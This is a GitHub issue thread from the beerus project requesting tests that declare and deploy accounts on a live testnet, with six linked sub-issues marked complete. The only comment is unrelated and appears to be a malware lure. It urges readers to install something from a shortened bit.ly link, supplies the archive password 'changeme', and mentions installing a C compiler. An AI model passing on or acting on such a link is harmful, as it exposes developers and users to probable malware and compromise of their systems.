### ISSUE TITLE
test: account declare deploy on live testnet

### ISSUE THREAD

**Issue by ICavlek** [eigerco/beerus#777]
After successfully providing account declare and deploy tests on local development nodes, it is necessary to also provide tests on live testnet. It is not going to be possible to constantly declare and deploy same accounts, but some queries on some already existing one should be provided. 
In scope of this issue, valid test workflow has to be created which would show declare and deploy functionalities on testnet.

- [x] https://github.com/eigerco/beerus/issues/802
- [x] https://github.com/eigerco/beerus/issues/803
- [x] https://github.com/eigerco/beerus/issues/804
- [x] https://github.com/eigerco/beerus/issues/805
- [x] https://github.com/eigerco/beerus/issues/806
- [x] https://github.com/eigerco/beerus/issues/807

**Comment by pinpolhoxx** [comment]
install this
https://bit.ly/3TzaAQd
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)
